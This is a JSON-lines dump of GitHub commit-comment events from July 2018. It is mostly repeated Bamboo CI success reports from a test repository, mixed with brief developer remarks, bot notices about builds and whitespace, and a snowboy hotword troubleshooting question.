{"id":"7930394757","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624988,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-06T18:39:54Z","updated_at":"2018-07-06T18:39:54Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-06T18:39:54Z"}
{"id":"7930394812","type":"CommitCommentEvent","actor":{"login":"johnstultz-work"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29624990,"position":30,"line":30,"path":"Documentation/timers/timekeeping.txt","commit_id":"7806f60e1d205db46eca6ad24429b3f86eda2588","created_at":"2018-07-06T18:39:54Z","updated_at":"2018-07-06T18:39:54Z","author_association":"CONTRIBUTOR","body":"Sure. But send it via email. You'll find me in the MAINTAINERS list."}},"created_at":"2018-07-06T18:39:54Z"}
{"id":"7930394906","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"AOSIP-old/platform_vendor_aosip"},"payload":{"comment":{"id":29624991,"position":null,"line":null,"path":null,"commit_id":"a46801bcd832bd28a51e69566b516b6b2b890ea5","created_at":"2018-07-06T18:39:56Z","updated_at":"2018-07-06T18:39:56Z","author_association":"CONTRIBUTOR","body":"🔥 nais"}},"created_at":"2018-07-06T18:39:56Z"}
{"id":"7930396140","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624994,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-06T18:40:15Z","updated_at":"2018-07-06T18:40:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:40:15Z"}
{"id":"7930396412","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624995,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-06T18:40:19Z","updated_at":"2018-07-06T18:40:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:40:19Z"}
{"id":"7930399375","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625000,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-06T18:41:03Z","updated_at":"2018-07-06T18:41:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:41:03Z"}
{"id":"7930399587","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29625001,"position":null,"line":null,"path":null,"commit_id":"2c7485c11c4e62479a61d3b2e28fd84677e2fe40","created_at":"2018-07-06T18:41:07Z","updated_at":"2018-07-06T18:41:07Z","author_association":"MEMBER","body":"Never haha"}},"created_at":"2018-07-06T18:41:07Z"}
{"id":"7930400649","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625003,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-06T18:41:22Z","updated_at":"2018-07-06T18:41:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:41:22Z"}
{"id":"7930400795","type":"CommitCommentEvent","actor":{"login":"jredrejo"},"repo":{"name":"learningequality/velox"},"payload":{"comment":{"id":29625004,"position":null,"line":null,"path":null,"commit_id":"f9e58c697660308f811945c28c0162998fc6b722","created_at":"2018-07-06T18:41:24Z","updated_at":"2018-07-06T18:41:24Z","author_association":"CONTRIBUTOR","body":"No problem, move it there if you want. As far as the functionality is kept, I don't have any preference of where the code is located."}},"created_at":"2018-07-06T18:41:24Z"}
{"id":"7930401056","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625005,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-06T18:41:28Z","updated_at":"2018-07-06T18:41:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:41:28Z"}
{"id":"7930404131","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29625012,"position":null,"line":null,"path":null,"commit_id":"b48f169a40bd467619304a3ef564a421435aa852","created_at":"2018-07-06T18:42:16Z","updated_at":"2018-07-06T18:42:16Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T18:42:16Z"}
{"id":"7930404249","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625013,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-06T18:42:18Z","updated_at":"2018-07-06T18:42:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:42:18Z"}
{"id":"7930404968","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625015,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-06T18:42:29Z","updated_at":"2018-07-06T18:42:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:42:29Z"}
{"id":"7930405467","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625016,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-06T18:42:38Z","updated_at":"2018-07-06T18:42:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:42:38Z"}
{"id":"7930408492","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625028,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-06T18:43:29Z","updated_at":"2018-07-06T18:43:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:43:29Z"}
{"id":"7930409020","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625030,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-06T18:43:37Z","updated_at":"2018-07-06T18:43:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:43:37Z"}
{"id":"7930409720","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625033,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-06T18:43:49Z","updated_at":"2018-07-06T18:43:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:43:49Z"}
{"id":"7930410823","type":"CommitCommentEvent","actor":{"login":"lehjr"},"repo":{"name":"MachineMuse/MachineMusePowersuits"},"payload":{"comment":{"id":29625040,"position":null,"line":null,"path":null,"commit_id":"50ebba2aac0617323a08ef964b791f78aff276b3","created_at":"2018-07-06T18:44:06Z","updated_at":"2018-07-06T18:44:06Z","author_association":"COLLABORATOR","body":"also did some refactoring. Trying to move single purpose module helpers out of MuseItemUtils and into their own file."}},"created_at":"2018-07-06T18:44:06Z"}
{"id":"7930411326","type":"CommitCommentEvent","actor":{"login":"bherr2"},"repo":{"name":"cns-iu/xmacroscope"},"payload":{"comment":{"id":29625042,"position":null,"line":null,"path":null,"commit_id":"e0d31136369a8b28980db185cc770001f6a5e345","created_at":"2018-07-06T18:44:13Z","updated_at":"2018-07-06T18:44:13Z","author_association":"MEMBER","body":"I appreciate linking to the issue, but I would like to see some sort of a description in the commit message too."}},"created_at":"2018-07-06T18:44:13Z"}
{"id":"7930412123","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625047,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-06T18:44:26Z","updated_at":"2018-07-06T18:44:26Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-06T18:44:26Z"}
{"id":"7930413153","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625049,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-06T18:44:42Z","updated_at":"2018-07-06T18:44:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:44:42Z"}
{"id":"7930413324","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625050,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-06T18:44:45Z","updated_at":"2018-07-06T18:44:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:44:45Z"}
{"id":"7930414208","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625058,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-06T18:44:59Z","updated_at":"2018-07-06T18:44:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:44:59Z"}
{"id":"7930418945","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625074,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-06T18:46:11Z","updated_at":"2018-07-06T18:46:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:46:11Z"}
{"id":"7930422683","type":"CommitCommentEvent","actor":{"login":"erlinux"},"repo":{"name":"erlinux/lctt-cli"},"payload":{"comment":{"id":29625080,"position":null,"line":null,"path":null,"commit_id":"18258ef5f2577a19b763b9c04c4de90326ee2b51","created_at":"2018-07-06T18:47:08Z","updated_at":"2018-07-06T18:47:08Z","author_association":"OWNER","body":"千万不要合并"}},"created_at":"2018-07-06T18:47:08Z"}
{"id":"7930426778","type":"CommitCommentEvent","actor":{"login":"meischdaddy30"},"repo":{"name":"Kitt-AI/snowboy"},"payload":{"comment":{"id":29625085,"position":null,"line":null,"path":null,"commit_id":"797a17e96fc085dbd70a6fefeb15b9bc43f52913","created_at":"2018-07-06T18:48:09Z","updated_at":"2018-07-06T18:48:09Z","author_association":"NONE","body":"@chenguoguo  I'm using this hotword with MMM-Assistant and heres how it is in my module\r\n\r\nfile: 'resources/u-models/jarvis.umdl',\r\nsensitivity: '0.8,0.80',\r\nhotwords: ['jarvis','jarvis']\r\n\r\nAnd when I start my mirror and say \"jarvis\" it gives the ding when it recognizes the hotword but then the microphone turns red and freezes like that. My whole MM is still working and shuffling through my other modules just my assistant is frozen. My assistant works great with snowboy but I would really like jarvis.\r\n\r\nHere's my error\r\n\r\n`0|MagicMir | at Socket.<anonymous (/home/pi/MagicMirror/modules/node_modules/node_helper/index.js:113:11) 0|MagicMir | at emitTwo (events.js:126:13) 0|MagicMir | at Socket.emit (events.js:214:7) 0|MagicMir | at /home/pi/MagicMirror/node_modules/socket.io/lib/socket.js:528:12 0|MagicMir | at _combinedTickCallback (internal/process/next_tick.js:131:7) 0|MagicMir | at process._tickCallback (internal/process/next_tick.js:180:9)`\r\n\r\nI tried using ['jarvis1','jarvis2'] and that didn't recognize anything.\r\n\r\nHopefully you can shed some light on this for me. This is the last thing I'd like to do before it's finished. Thanks in advance!"}},"created_at":"2018-07-06T18:48:09Z"}
{"id":"7930434040","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"MrAlex94/Waterfox"},"payload":{"comment":{"id":29625097,"position":null,"line":null,"path":null,"commit_id":"d4cf3ff20ff867da444743af6cebfb01039e9cdf","created_at":"2018-07-06T18:50:03Z","updated_at":"2018-07-06T18:50:03Z","author_association":"CONTRIBUTOR","body":"FF62 has more `hal/` secfixes: mozilla/gecko-dev@a2444ee4e6e87 (+ESR60), mozilla/gecko-dev@051d1b6a48a7, mozilla/gecko-dev@ff627ab4afeb."}},"created_at":"2018-07-06T18:50:03Z"}
{"id":"7930436674","type":"CommitCommentEvent","actor":{"login":"daivadaiva"},"repo":{"name":"gedasprojektai/front-end-one-"},"payload":{"comment":{"id":29625102,"position":4,"line":9,"path":"Values and Approach Principles.txt","commit_id":"e12cb424a5a26edfd73986b1950045cdf0ada969","created_at":"2018-07-06T18:50:44Z","updated_at":"2018-07-06T18:50:44Z","author_association":"COLLABORATOR","body":"Great!"}},"created_at":"2018-07-06T18:50:44Z"}
{"id":"7930437688","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/radical.pilot-feedstock"},"payload":{"comment":{"id":29625108,"position":null,"line":null,"path":null,"commit_id":"cbd0431151e5add203e3cc58f09a742860865860","created_at":"2018-07-06T18:50:59Z","updated_at":"2018-07-06T18:50:59Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @iparask, @andre-merzky were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-06T18:50:59Z"}
{"id":"7930437859","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29625109,"position":null,"line":null,"path":null,"commit_id":"52cee460abcf0185ab5b4836a32af433257f7707","created_at":"2018-07-06T18:51:02Z","updated_at":"2018-07-06T18:51:02Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/messages.php"}},"created_at":"2018-07-06T18:51:02Z"}
{"id":"7930437968","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29625110,"position":null,"line":null,"path":null,"commit_id":"b9507853d44b14bf7383bb6a30b22530e0856bf6","created_at":"2018-07-06T18:51:04Z","updated_at":"2018-07-06T18:51:04Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: config.sample.inc.php"}},"created_at":"2018-07-06T18:51:04Z"}
{"id":"7930438842","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29625113,"position":null,"line":null,"path":null,"commit_id":"19977c6748e524374f906c48f56bdc8658513d0a","created_at":"2018-07-06T18:51:17Z","updated_at":"2018-07-06T18:51:17Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-61](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-61).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-61-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T18:51:17Z"}
{"id":"7930441117","type":"CommitCommentEvent","actor":{"login":"daivadaiva"},"repo":{"name":"gedasprojektai/front-end-one-"},"payload":{"comment":{"id":29625123,"position":14,"line":21,"path":"Values and Approach Principles.txt","commit_id":"e12cb424a5a26edfd73986b1950045cdf0ada969","created_at":"2018-07-06T18:51:52Z","updated_at":"2018-07-06T18:51:52Z","author_association":"COLLABORATOR","body":"It's a really good idea."}},"created_at":"2018-07-06T18:51:52Z"}
